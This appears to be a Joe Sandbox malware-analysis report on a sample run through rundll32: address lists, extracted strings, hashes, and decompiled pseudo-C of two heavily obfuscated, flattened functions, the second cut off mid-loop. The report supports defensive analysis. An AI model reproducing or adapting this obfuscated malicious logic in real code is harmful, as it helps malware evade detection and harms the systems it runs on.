0x0020ce8c
0x0020ce97
0x0020cea2
0x0020cead
0x0020ceb5
0x0020cebd
0x0020cec5
0x0020cecd
0x0020ced5
0x0020cedd
0x0020cee5
0x0020ceea
0x0020ceef
0x0020cef7
0x0020ceff
0x0020cf0c
0x0020cf0d
0x0020cf11
0x0020cf19
0x0020cf24
0x0020cf2c
0x0020cf37
0x0020cf4a
0x0020cf51
0x0020cf5c
0x0020cf67
0x0020cf72
0x0020cf7a
0x0020cf85
0x0020cf98
0x0020cf9f
0x0020cfaa
0x0020cfb7
0x0020cfbb
0x0020cfc3
0x0020cfcb
0x0020cfd3
0x0020cfde
0x0020cfe9
0x0020cff4
0x0020cfff
0x0020d00a
0x0020d015
0x0020d020
0x0020d02b
0x0020d036
0x0020d041
0x0020d049
0x0020d04e
0x0020d056
0x0020d05e
0x0020d069
0x0020d074
0x0020d07c
0x0020d087
0x0020d095
0x0020d099
0x0020d0a1
0x0020d0a9
0x0020d0b1
0x0020d0bc
0x0020d0c7
0x0020d0d2
0x0020d0df
0x0020d0ea
0x0020d0f5
0x0020d100
0x0020d108
0x0020d113
0x0020d11e
0x0020d126
0x0020d132
0x0020d135
0x0020d13c
0x0020d147
0x0020d152
0x0020d15d
0x0020d165
0x0020d170
0x0020d186
0x0020d18d
0x0020d198
0x0020d1a0
0x0020d1a8
0x0020d1b5
0x0020d1b8
0x0020d1bc
0x0020d1c4
0x0020d1da
0x0020d1e8
0x0020d1eb
0x0020d1f2
0x0020d1f9
0x0020d208
0x0020d208
0x0020d208
0x0020d20d
0x0020d20d
0x0020d20f
0x0020d20f
0x0020d215
0x0020d215
0x0020d386
0x0020d388
0x0020d38f
0x0020d390
0x0020d29d
0x0020d29d
0x0020d2a1
0x0020d2a1
0x00000000
0x0020d2a1
0x0020d221
0x0020d31f
0x0020d321
0x0020d327
0x0020d327
0x0020d323
0x0020d323
0x0020d323
0x0020d329
0x0020d32b
0x0020d332
0x0020d332
0x0020d32d
0x0020d32d
0x0020d32d
0x0020d35b
0x0020d360
0x0020d365
0x0020d36d
0x00000000
0x0020d36d
0x0020d22d
0x0020d315
0x0020d20d
0x0020d20d
0x0020d20f
0x0020d20f
0x00000000
0x0020d20f
0x00000000
0x0020d20d
0x0020d23a
0x0020d2f8
0x0020d2fd
0x0020d300
0x0020d304
0x0020d310
0x00000000
0x0020d310
0x0020d242
0x0020d291
0x0020d296
0x0020d29b
0x00000000
0x0020d29c
0x0020d24a
0x0020d639
0x0020d639
0x0020d63f
0x0020d272
0x0020d27c
0x0020d27c
0x0020d645
0x00000000
0x0020d645
0x0020d269
0x00000000
0x0020d398
0x0020d398
0x0020d39e
0x0020d51a
0x0020d51c
0x0020d53c
0x0020d51e
0x0020d51e
0x0020d52b
0x0020d530
0x0020d533
0x0020d533
0x0020d5c9
0x0020d5d2
0x0020d5d9
0x0020d5de
0x0020d5e1
0x0020d5e3
0x0020d62b
0x0020d630
0x0020d630
0x0020d634
0x00000000
0x0020d634
0x0020d5e5
0x0020d5f1
0x0020d612
0x0020d617
0x0020d61a
0x0020d621
0x00000000
0x0020d621
0x0020d3a4
0x0020d3aa
0x0020d498
0x0020d49a
0x0020d4a6
0x0020d4a9
0x0020d4aa
0x0020d4ac
0x0020d4c7
0x0020d4cc
0x0020d4cf
0x0020d4d1
0x0020d4ed
0x0020d4f2
0x0020d4f5
0x0020d4f5
0x0020d509
0x0020d50f
0x0020d510
0x00000000
0x0020d510
0x0020d3b0
0x0020d3b6
0x0020d423
0x0020d442
0x0020d447
0x0020d449
0x0020d45a
0x0020d474
0x0020d479
0x00000000
0x0020d479
0x0020d3b8
0x0020d3be
0x0020d414
0x0020d419
0x00000000
0x0020d419
0x0020d3c0
0x0020d3c6
0x00000000
0x00000000
0x0020d3e6
0x0020d3e8
0x0020d3ed
0x0020d3f1
0x0020d3f5
0x0020d3f5
0x0020d20d

Strings

.ll:, xrefs: 0020D1BC
m^, xrefs: 0020CAA3
q, xrefs: 0020CEEF
Qjcc, xrefs: 0020D13C
^, xrefs: 0020C936
", xrefs: 0020CFC3
Ta$ , xrefs: 0020D398
?o, xrefs: 0020D1C4
,, xrefs: 0020C830
@l, xrefs: 0020CEA2
rW, xrefs: 0020CAF8
@|, xrefs: 0020CE35
~, xrefs: 0020D041
T, xrefs: 0020C99B
., xrefs: 0020D0DF
3, xrefs: 0020CA13
Ta$ , xrefs: 0020D30B
XD, xrefs: 0020D0B1
r, xrefs: 0020CC20

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: "$.ll:$.$?o$@l$@|$Qjcc$T$Ta$ $Ta$ $XD$^$m^$r$rW$,$3$q$~
API String ID: 0-3595463394
Opcode ID: fff2c23c59ebadd6c0d19acc0cf588053edd88ea9c5664634a313f3257c4f0dc
Instruction ID: eb69bdfc3dd7971ffac835c818e1c81e3de11ba747b55a4091a5a09703aa20b5
Opcode Fuzzy Hash: fff2c23c59ebadd6c0d19acc0cf588053edd88ea9c5664634a313f3257c4f0dc
Instruction Fuzzy Hash: 19721F715093818FE3B8CF65C58AB9BBBE1BBC4304F10891DE5D9862A1DBB58859CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0020F98C, Relevance: 20.4, Strings: 16, Instructions: 390
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E0020F98C(intOrPtr* __edx, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v1;
				char _v96;
				char _v108;
				char _v112;
				char _v116;
				intOrPtr _v120;
				char _v124;
				char _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				unsigned int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				intOrPtr _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				intOrPtr _v268;
				void* __ecx;
				void* _t344;
				void* _t374;
				signed int _t377;
				intOrPtr _t391;
				void* _t392;
				intOrPtr _t393;
				signed int _t395;
				intOrPtr _t396;
				signed int _t397;
				intOrPtr* _t401;
				intOrPtr _t403;
				intOrPtr* _t416;
				char* _t448;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				signed int _t456;
				signed int _t457;
				signed int _t458;
				signed int _t459;
				char* _t460;
				void* _t461;
				intOrPtr* _t468;
				void* _t470;
				void* _t472;

				_t401 = _a4;
				_push(_a16);
				_t468 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_t401);
				_push(__edx);
				E0020602B(_t344);
				_v180 = 0x2a54;
				_t470 =  &_v268 + 0x18;
				_v180 = _v180 ^ 0xdbb28899;
				_t403 = 0;
				_t461 = 0x405be48;
				_v268 = 0;
				_t450 = 0x55;
				_v180 = _v180 * 0x34;
				_v180 = _v180 ^ 0xa04911e4;
				_v164 = 0x788;
				_v164 = _v164 * 0x79;
				_v164 = _v164 ^ 0x00038f4a;
				_v260 = 0xdd03;
				_v260 = _v260 ^ 0x82285f25;
				_v260 = _v260 >> 7;
				_v260 = _v260 << 4;
				_v260 = _v260 ^ 0x104552fc;
				_v132 = 0x81fa;
				_v132 = _v132 | 0x4b6553e1;
				_v132 = _v132 ^ 0x4b658f00;
				_v208 = 0xbd69;
				_t451 = 0x73;
				_v208 = _v208 / _t450;
				_v208 = _v208 + 0x56ba;
				_v208 = _v208 ^ 0x000029ec;
				_v156 = 0x625a;
				_v156 = _v156 + 0xffff65b2;
				_v156 = _v156 ^ 0xffffa807;
				_v176 = 0xc378;
				_v176 = _v176 >> 1;
				_v176 = _v176 + 0x1919;
				_v176 = _v176 ^ 0x00004408;
				_v228 = 0xbfad;
				_v228 = _v228 + 0xffff004b;
				_v228 = _v228 / _t451;
				_t452 = 0x16;
				_v228 = _v228 / _t452;
				_v228 = _v228 ^ 0x0019c242;
				_v264 = 0x218a;
				_v264 = _v264 | 0xaefe0d97;
				_v264 = _v264 + 0x77f0;
				_v264 = _v264 + 0xffffbecb;
				_v264 = _v264 ^ 0xaefe1c0e;
				_v152 = 0x1773;
				_v152 = _v152 + 0x7c73;
				_v152 = _v152 ^ 0x000090c4;
				_v140 = 0xfcb3;
				_v140 = _v140 + 0xffff1dd8;
				_v140 = _v140 ^ 0x00004a86;
				_v252 = 0x9e2f;
				_t453 = 9;
				_v252 = _v252 / _t453;
				_v252 = _v252 << 0xc;
				_v252 = _v252 + 0x6e7b;
				_v252 = _v252 ^ 0x01198ad6;
				_v136 = 0x978d;
				_v136 = _v136 << 0xb;
				_v136 = _v136 ^ 0x04bc6438;
				_v144 = 0xf0b5;
				_t454 = 0x79;
				_v144 = _v144 * 0x51;
				_v144 = _v144 ^ 0x004c2c51;
				_v224 = 0xa482;
				_v224 = _v224 ^ 0xc585cea3;
				_v224 = _v224 / _t454;
				_v224 = _v224 ^ 0x01a18743;
				_v148 = 0xd0a0;
				_v148 = _v148 >> 1;
				_v148 = _v148 ^ 0x000025e7;
				_v232 = 0xead1;
				_v232 = _v232 ^ 0xc3cfbc77;
				_v232 = _v232 | 0xf3c428cf;
				_v232 = _v232 + 0xffff938a;
				_v232 = _v232 ^ 0xf3cf35e7;
				_v160 = 0xb488;
				_v160 = _v160 + 0xf6e2;
				_v160 = _v160 ^ 0x0001c37e;
				_v212 = 0xc903;
				_t455 = 0x1e;
				_v212 = _v212 / _t455;
				_v212 = _v212 ^ 0xfd3886ab;
				_v212 = _v212 ^ 0xfd38fa88;
				_v196 = 0xdd05;
				_v196 = _v196 << 5;
				_v196 = _v196 + 0xdc4b;
				_v196 = _v196 ^ 0x001c7bd6;
				_v200 = 0x4db0;
				_v200 = _v200 ^ 0x1a7afaec;
				_v200 = _v200 >> 8;
				_v200 = _v200 ^ 0x001a5e83;
				_v240 = 0x9d3f;
				_v240 = _v240 >> 8;
				_v240 = _v240 << 9;
				_v240 = _v240 + 0x917a;
				_v240 = _v240 ^ 0x0001a611;
				_v256 = 0x4a86;
				_v256 = _v256 >> 0xd;
				_t456 = 0x55;
				_v256 = _v256 * 0x35;
				_v256 = _v256 + 0xffffab30;
				_v256 = _v256 ^ 0xffffb251;
				_v204 = 0x386;
				_v204 = _v204 / _t456;
				_v204 = _v204 ^ 0xc8309f8e;
				_v204 = _v204 ^ 0xc830cb09;
				_v172 = 0x8769;
				_v172 = _v172 >> 0xe;
				_v172 = _v172 ^ 0x00003b2d;
				_v244 = 0x2b5b;
				_v244 = _v244 + 0xb0ca;
				_v244 = _v244 + 0xd805;
				_v244 = _v244 << 2;
				_v244 = _v244 ^ 0x0006bd06;
				_v184 = 0x1527;
				_v184 = _v184 | 0xeeea078d;
				_t457 = 0x28;
				_v184 = _v184 / _t457;
				_v184 = _v184 ^ 0x05f92fca;
				_v192 = 0x11fc;
				_t458 = 0x16;
				_v192 = _v192 / _t458;
				_v192 = _v192 ^ 0x8895e54e;
				_v192 = _v192 ^ 0x8895ebcd;
				_v168 = 0xe011;
				_v168 = _v168 + 0x4c50;
				_v168 = _v168 ^ 0x0001058b;
				_v216 = 0xf07;
				_t459 = 0x32;
				_v216 = _v216 * 0x36;
				_v216 = _v216 >> 2;
				_v216 = _v216 ^ 0x00008949;
				_v248 = 0xde23;
				_v248 = _v248 + 0xecd9;
				_v248 = _v248 << 0xd;
				_v248 = _v248 ^ 0x1d8b17f5;
				_v248 = _v248 ^ 0x24d4a8d4;
				_v220 = 0x3854;
				_v220 = _v220 | 0x09b0f0f7;
				_v220 = _v220 + 0xe63e;
				_v220 = _v220 ^ 0x09b1b8f3;
				_v188 = 0x295e;
				_v188 = _v188 * 0x23;
				_v188 = _v188 / _t459;
				_v188 = _v188 ^ 0x00001cf4;
				_t460 = _v124;
				while(1) {
					L1:
					_t441 = _v236;
					while(1) {
						L2:
						_t472 = _t461 - 0x299f8b6c;
						if(_t472 <= 0) {
							break;
						}
						if(_t461 == 0x2e2d51e6) {
							_v124 = 0x14;
							_t374 = E0020F39F(_v244, _v128, _t460 + 0x60,  &_v124, _v184, _v192, _v164, _t403, _v168);
							_t403 = _v268;
							_t470 = _t470 + 0x1c;
							_t441 = _v236;
							if(_t374 == 0) {
								continue;
							}
							_t461 = 0x8f3e942;
							_t403 = 1;
							_v268 = 1;
							L29:
							if(_t461 == 0x33ec2607) {
								L33:
								return _v268;
							}
							while(1) {
								L1:
								_t441 = _v236;
								goto L2;
							}
						}
						if(_t461 == 0x2e332bc4) {
							E00212674(_v252, _v136, _a4, _t441, _v144, _v224,  *_t468);
							_t470 = _t470 + 0x14;
							_t461 = 0x2452d659;
							L9:
							_t403 = _v268;
							goto L1;
						}
						if(_t461 == 0x2efa85f7) {
							_t377 = _a4 + 1;
							if((_t377 & 0x0000000f) != 0) {
								_t377 = (_t377 & 0xfffffff0) + 0x10;
							}
							 *((intOrPtr*)(_t401 + 4)) = _t377 + 0x74;
							_push(_t403);
							_push(_t403);
							_t460 = E00208736( *((intOrPtr*)(_t401 + 4)));
							 *_t401 = _t460;
							if(_t460 == 0) {
								goto L33;
							} else {
								_t317 = _t460 + 0x74; // 0x74
								_t441 = _t317;
								_v116 = _a4;
								_t461 = 0x332cf2c2;
								_t403 = _v268;
								_v236 = _t317;
								_v120 =  *((intOrPtr*)(_t401 + 4)) - 0x74;
								continue;
							}
						}
						if(_t461 != 0x332cf2c2) {
							goto L29;
						}
						_t396 =  *0x21ca20; // 0x0
						_t397 = E00211B49( &_v128, _v264, _t403,  *((intOrPtr*)(_t396 + 0x2c)), _t403, _v152, _v140);
						_t470 = _t470 + 0x14;
						asm("sbb esi, esi");
						_t461 = ( ~_t397 & 0x0493a058) + 0x299f8b6c;
						goto L9;
					}
					if(_t472 == 0) {
						if(_t403 == 0) {
							E0020F536(_v156, _v176, _v228,  *_t401);
						}
						goto L33;
					}
					if(_t461 == 0x405be48) {
						_t461 = 0x2efa85f7;
						goto L2;
					}
					if(_t461 == 0x8f3e942) {
						_push(_t403);
						_push(_t403);
						E00205F43(_t403, _v128);
						_t461 = 0x299f8b6c;
						goto L9;
					}
					if(_t461 == 0x1e33600c) {
						_v112 = 0x6c;
						_t391 =  *0x21ca20; // 0x0
						_t392 = E00208010( &_v108,  &_v112, _v188, _v240,  *((intOrPtr*)(_t391 + 0x24)),  *((intOrPtr*)(_t391 + 0x10)), _v256, _v204, _v180, _v172);
						_t470 = _t470 + 0x20;
						if(_t392 == 0) {
							_t461 = 0x8f3e942;
							goto L9;
						}
						_t416 =  &_v1;
						_t448 = _t460;
						do {
							 *_t448 =  *_t416;
							_t448 = _t448 + 1;
							_t416 = _t416 - 1;
						} while (_t416 >=  &_v96);
						_t461 = 0x2e2d51e6;
						goto L9;
					}
					if(_t461 != 0x2452d659) {
						goto L29;
					}
					_t393 =  *0x21ca20; // 0x0
					_t395 = E00210A3B(_v120, _v128, _v148, _v232, _v160, _t403,  &_v116, _v212, _v196, _t441, _v200, _t403,  *((intOrPtr*)(_t393 + 0x10)));
					_t470 = _t470 + 0x2c;
					asm("sbb esi, esi");
					_t461 = ( ~_t395 & 0x153f76ca) + 0x8f3e942;
					goto L9;
				}
			}

0x0020f993
0x0020f99d
0x0020f9a4
0x0020f9a6
0x0020f9ad
0x0020f9b4
0x0020f9b5
0x0020f9b7
0x0020f9bc
0x0020f9c7
0x0020f9ca
0x0020f9d9
0x0020f9db
0x0020f9e0
0x0020f9e6
0x0020f9e9
0x0020f9ed
0x0020f9f5
0x0020fa02
0x0020fa06
0x0020fa0e
0x0020fa16
0x0020fa1e
0x0020fa23
0x0020fa28
0x0020fa30
0x0020fa3b
0x0020fa46
0x0020fa51
0x0020fa5f
0x0020fa60
0x0020fa66
0x0020fa6e
0x0020fa76
0x0020fa81
0x0020fa8c
0x0020fa97
0x0020fa9f
0x0020faa3
0x0020faab
0x0020fab3
0x0020fabb
0x0020facb
0x0020fad5
0x0020fada
0x0020fade
0x0020fae6
0x0020faee
0x0020faf6
0x0020fafe
0x0020fb06
0x0020fb0e
0x0020fb19
0x0020fb24
0x0020fb2f
0x0020fb3a
0x0020fb45
0x0020fb52
0x0020fb5e
0x0020fb63
0x0020fb69
0x0020fb6e
0x0020fb76
0x0020fb7e
0x0020fb89
0x0020fb91
0x0020fb9c
0x0020fbaf
0x0020fbb2
0x0020fbb9
0x0020fbc4
0x0020fbcc
0x0020fbdc
0x0020fbe0
0x0020fbe8
0x0020fbf3
0x0020fbfa
0x0020fc05
0x0020fc0d
0x0020fc15
0x0020fc1d
0x0020fc25
0x0020fc2d
0x0020fc38
0x0020fc43
0x0020fc4e
0x0020fc5a
0x0020fc5f
0x0020fc65
0x0020fc6d
0x0020fc75
0x0020fc7d
0x0020fc82
0x0020fc8a
0x0020fc92
0x0020fc9a
0x0020fca2
0x0020fca7
0x0020fcaf
0x0020fcb7
0x0020fcbc
0x0020fcc1
0x0020fcc9
0x0020fcd1
0x0020fcd9
0x0020fce3
0x0020fce4
0x0020fce8
0x0020fcf0
0x0020fcf8
0x0020fd06
0x0020fd0a
0x0020fd12
0x0020fd1a
0x0020fd22
0x0020fd27
0x0020fd2f
0x0020fd37
0x0020fd3f
0x0020fd47
0x0020fd4c
0x0020fd54
0x0020fd5c
0x0020fd6c
0x0020fd71
0x0020fd77
0x0020fd7f
0x0020fd8b
0x0020fd90
0x0020fd96
0x0020fd9e
0x0020fda6
0x0020fdae
0x0020fdb6
0x0020fdbe
0x0020fdcb
0x0020fdcc
0x0020fdd0
0x0020fdd5
0x0020fddd
0x0020fde5
0x0020fded
0x0020fdf2
0x0020fdfa
0x0020fe02
0x0020fe0a
0x0020fe12
0x0020fe1a
0x0020fe22
0x0020fe2f
0x0020fe39
0x0020fe3d
0x0020fe45
0x0020fe4c
0x0020fe4c
0x0020fe4c
0x0020fe50
0x0020fe50
0x0020fe50
0x0020fe56
0x00000000
0x00000000
0x0020ff96
0x0021009f
0x002100ca
0x002100cf
0x002100d3
0x002100d6
0x002100dc
0x00000000
0x00000000
0x002100e4
0x002100e9
0x002100ea
0x002100ee
0x002100f4
0x00210117
0x00210125
0x00210125
0x0020fe4c
0x0020fe4c
0x0020fe4c
0x00000000
0x0020fe4c
0x0020fe4c
0x0020ffa2
0x00210082
0x00210087
0x0021008a
0x0020fee7
0x0020fee7
0x00000000
0x0020fee7
0x0020ffae
0x00210001
0x00210004
0x00210009
0x00210009
0x0021000f
0x00210021
0x00210022
0x0021002b
0x0021002d
0x00210033
0x00000000
0x00210039
0x0021003c
0x0021003c
0x00210045
0x0021004c
0x00210051
0x00210055
0x00210059
0x00000000
0x00210059
0x00210033
0x0020ffb6
0x00000000
0x00000000
0x0020ffca
0x0020ffdf
0x0020ffe4
0x0020ffeb
0x0020fff3
0x00000000
0x0020fff3
0x0020fe5c
0x002100fd
0x00210110
0x00210116
0x00000000
0x002100fd
0x0020fe68
0x0020ff86
0x00000000
0x0020ff86
0x0020fe74
0x0020ff73
0x0020ff74
0x0020ff75
0x0020ff7c
0x00000000
0x0020ff7c
0x0020fe80
0x0020fef4
0x0020ff19
0x0020ff2c
0x0020ff31
0x0020ff36
0x0020ff59
0x00000000
0x0020ff59
0x0020ff38
0x0020ff3f
0x0020ff41
0x0020ff43
0x0020ff45
0x0020ff46
0x0020ff4e
0x0020ff52
0x00000000
0x0020ff52
0x0020fe88
0x00000000
0x00000000
0x0020fe8e
0x0020fecd
0x0020fed2
0x0020fed9
0x0020fee1
0x00000000
0x0020fee1

Strings

SeK, xrefs: 0020FA3B
s|, xrefs: 0020FB19
>, xrefs: 0020FE12
^), xrefs: 0020FE22
K, xrefs: 0020FABB
[+, xrefs: 0020FD2F
Q,L, xrefs: 0020FBB9
%, xrefs: 0020FBFA
Q-., xrefs: 0020FF52
PL, xrefs: 0020FDAE
Q-., xrefs: 0020FF90
Zb, xrefs: 0020FA76
), xrefs: 0020FA6E
l, xrefs: 0020FEF4
{n, xrefs: 0020FB6E
-;, xrefs: 0020FD27

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: -;$>$K$PL$Q,L$Zb$[+$^)$l$s|${n$%$)$Q-.$Q-.$SeK
API String ID: 0-11970308
Opcode ID: e7a80410fd7811b6652f8bce278c00f742dd4fec0e46520a37e18fbca9a11e59
Instruction ID: aa956c13802a6ed634e44e7bbce845ec1d90022b122bea08bae21c2f0f8e8460
Opcode Fuzzy Hash: e7a80410fd7811b6652f8bce278c00f742dd4fec0e46520a37e18fbca9a11e59
Instruction Fuzzy Hash: 681255725083818FD364CF25C889A8BBBF2BBD4314F108A1DF6D9862A1D7B59959CF42

Uniqueness

Uniqueness Score: -1.00%

Function 0020D7EB, Relevance: 20.3, Strings: 16, Instructions: 347
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E0020D7EB() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				signed int _v1176;
				signed int _v1180;
				signed int _v1184;
				signed int _v1188;
				signed int _v1192;
				signed int _v1196;
				signed int _v1200;
				signed int _v1204;
				signed int _v1208;
				signed int _v1212;
				void* _t365;
				intOrPtr _t367;
				signed int _t379;
				void* _t380;
				void* _t399;
				intOrPtr _t402;
				signed int _t408;
				intOrPtr _t409;
				intOrPtr* _t410;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t414;
				signed int _t416;
				signed int* _t417;
				void* _t419;

				_t417 =  &_v1212;
				_v1164 = 0xe848;
				_v1164 = _v1164 << 0xc;
				_t380 = 0xeb1d0fe;
				_v1164 = _v1164 << 2;
				_v1164 = _v1164 ^ 0x3a120029;
				_v1196 = 0xb50a;
				_v1196 = _v1196 * 0x54;
				_v1196 = _v1196 << 1;
				_v1196 = _v1196 << 0xc;
				_v1196 = _v1196 ^ 0x6ce97179;
				_v1072 = 0xa1a9;
				_v1072 = _v1072 >> 6;
				_v1072 = _v1072 ^ 0x00006740;
				_v1112 = 0x5ab8;
				_v1112 = _v1112 | 0xd40f1486;
				_v1112 = _v1112 ^ 0xd40f3c8d;
				_v1168 = 0x99b2;
				_v1168 = _v1168 ^ 0x8e209920;
				_v1168 = _v1168 + 0x17b0;
				_v1168 = _v1168 + 0xffff252c;
				_v1168 = _v1168 ^ 0x8e1f3ab7;
				_v1108 = 0x6700;
				_v1108 = _v1108 ^ 0xd74b138d;
				_v1108 = _v1108 ^ 0xd74b4d2a;
				_v1116 = 0xa6d3;
				_v1116 = _v1116 << 0xc;
				_v1116 = _v1116 ^ 0x0a6d47ef;
				_v1144 = 0x46d4;
				_v1144 = _v1144 | 0x60392883;
				_t411 = 0x3e;
				_v1052 = _v1052 & 0x00000000;
				_v1144 = _v1144 / _t411;
				_v1144 = _v1144 ^ 0x018d3ef5;
				_v1212 = 0x195d;
				_v1212 = _v1212 + 0x9a8f;
				_v1212 = _v1212 >> 2;
				_v1212 = _v1212 >> 0xf;
				_v1212 = _v1212 ^ 0x00005610;
				_v1092 = 0x8c48;
				_v1092 = _v1092 | 0x14bcb660;
				_v1092 = _v1092 ^ 0x14bcd719;
				_v1184 = 0xdf30;
				_v1184 = _v1184 | 0x71150163;
				_v1184 = _v1184 + 0xffff3ca6;
				_v1184 = _v1184 >> 5;
				_v1184 = _v1184 ^ 0x03888299;
				_v1100 = 0xf0a2;
				_v1100 = _v1100 >> 2;
				_v1100 = _v1100 ^ 0x00007018;
				_v1076 = 0xde4e;
				_v1076 = _v1076 * 0x25;
				_v1076 = _v1076 ^ 0x0020254d;
				_v1084 = 0x8f7c;
				_v1084 = _v1084 + 0x3023;
				_v1084 = _v1084 ^ 0x00008967;
				_v1136 = 0x4c3;
				_v1136 = _v1136 + 0xbbe6;
				_v1136 = _v1136 | 0x03b94668;
				_v1136 = _v1136 ^ 0x03b9f10c;
				_v1120 = 0xdab0;
				_v1120 = _v1120 << 2;
				_v1120 = _v1120 ^ 0x0003158f;
				_v1080 = 0xb6c1;
				_v1080 = _v1080 ^ 0x2339c7b2;
				_v1080 = _v1080 ^ 0x2339156d;
				_v1152 = 0xaa63;
				_v1152 = _v1152 | 0x7d17af71;
				_v1152 = _v1152 << 0xc;
				_v1152 = _v1152 ^ 0x7af75802;
				_v1088 = 0x49a;
				_v1088 = _v1088 >> 9;
				_v1088 = _v1088 ^ 0x00004f36;
				_v1192 = 0x2678;
				_v1192 = _v1192 + 0xb679;
				_v1192 = _v1192 << 0x10;
				_v1192 = _v1192 + 0xffff3370;
				_v1192 = _v1192 ^ 0xdcf068a3;
				_v1064 = 0xeafb;
				_v1064 = _v1064 << 1;
				_v1064 = _v1064 ^ 0x00019538;
				_v1096 = 0x88f8;
				_t412 = 0x34;
				_v1096 = _v1096 * 0x4f;
				_v1096 = _v1096 ^ 0x002a1ade;
				_v1132 = 0xf8dd;
				_v1132 = _v1132 << 0xb;
				_v1132 = _v1132 * 6;
				_v1132 = _v1132 ^ 0x2ea92e25;
				_v1148 = 0xb66c;
				_v1148 = _v1148 * 0x79;
				_v1148 = _v1148 * 0x37;
				_v1148 = _v1148 ^ 0x12863225;
				_v1044 = 0x2ced;
				_v1044 = _v1044 | 0x6c1d274b;
				_v1044 = _v1044 ^ 0x6c1d554c;
				_v1104 = 0xd4fb;
				_v1104 = _v1104 + 0xc222;
				_v1104 = _v1104 ^ 0x0001c0a4;
				_v1140 = 0xeff1;
				_v1140 = _v1140 | 0x2c578e17;
				_v1140 = _v1140 ^ 0x1f5808a8;
				_v1140 = _v1140 ^ 0x330f90e2;
				_v1156 = 0x54a4;
				_v1156 = _v1156 ^ 0xe69aec3e;
				_v1156 = _v1156 ^ 0x7a062859;
				_v1156 = _v1156 ^ 0x9c9c8f10;
				_v1180 = 0xa2be;
				_v1180 = _v1180 / _t412;
				_v1180 = _v1180 << 0xb;
				_v1180 = _v1180 << 6;
				_v1180 = _v1180 ^ 0x0642737d;
				_v1204 = 0x65ae;
				_v1204 = _v1204 + 0xb2b7;
				_v1204 = _v1204 + 0xbb73;
				_v1204 = _v1204 << 6;
				_v1204 = _v1204 ^ 0x0074b164;
				_v1176 = 0x3ecd;
				_v1176 = _v1176 | 0x1d534930;
				_v1176 = _v1176 << 0xa;
				_v1176 = _v1176 ^ 0x842f9ee3;
				_v1176 = _v1176 ^ 0xc9d04901;
				_v1056 = 0xf360;
				_v1056 = _v1056 | 0x93122b66;
				_v1056 = _v1056 ^ 0x9312fd26;
				_v1124 = 0x4a26;
				_v1124 = _v1124 | 0x286a3d77;
				_v1124 = _v1124 ^ 0x286a2522;
				_v1060 = 0x57ed;
				_v1060 = _v1060 + 0x784b;
				_v1060 = _v1060 ^ 0x0000c3a5;
				_v1068 = 0x69c7;
				_v1068 = _v1068 << 5;
				_v1068 = _v1068 ^ 0x000d6de9;
				_v1208 = 0xffbd;
				_v1208 = _v1208 * 0x3d;
				_v1208 = _v1208 << 5;
				_v1208 = _v1208 + 0x87f5;
				_v1208 = _v1208 ^ 0x079ed184;
				_v1128 = 0x5d27;
				_v1128 = _v1128 >> 0xc;
				_v1128 = _v1128 ^ 0x62edd6dc;
				_v1128 = _v1128 ^ 0x62ed9c54;
				_v1048 = 0x8776;
				_t413 = 0x1e;
				_t408 = _v1052;
				_v1048 = _v1048 * 0xc;
				_v1048 = _v1048 ^ 0x000959b7;
				_v1172 = 0x35cb;
				_t379 = _v1052;
				_v1172 = _v1172 / _t413;
				_v1172 = _v1172 | 0x92682d74;
				_v1172 = _v1172 ^ 0x346a72ec;
				_v1172 = _v1172 ^ 0xa6025f11;
				_v1188 = 0x8f0f;
				_t414 = 0x66;
				_t416 = _v1052;
				_v1188 = _v1188 / _t414;
				_v1188 = _v1188 << 5;
				_v1188 = _v1188 + 0x12e7;
				_v1188 = _v1188 ^ 0x00003fc5;
				_v1200 = 0x51b9;
				_v1200 = _v1200 | 0x17a7f9cb;
				_v1200 = _v1200 << 8;
				_v1200 = _v1200 | 0xe40f2208;
				_v1200 = _v1200 ^ 0xe7fffb08;
				_v1160 = 0x57cd;
				_v1160 = _v1160 + 0xffffc371;
				_v1160 = _v1160 ^ 0x54a04296;
				_v1160 = _v1160 ^ 0x54a059b8;
				while(1) {
					L1:
					_t399 = 0x5c;
					do {
						while(1) {
							L2:
							_t419 = _t380 - 0x21daabfe;
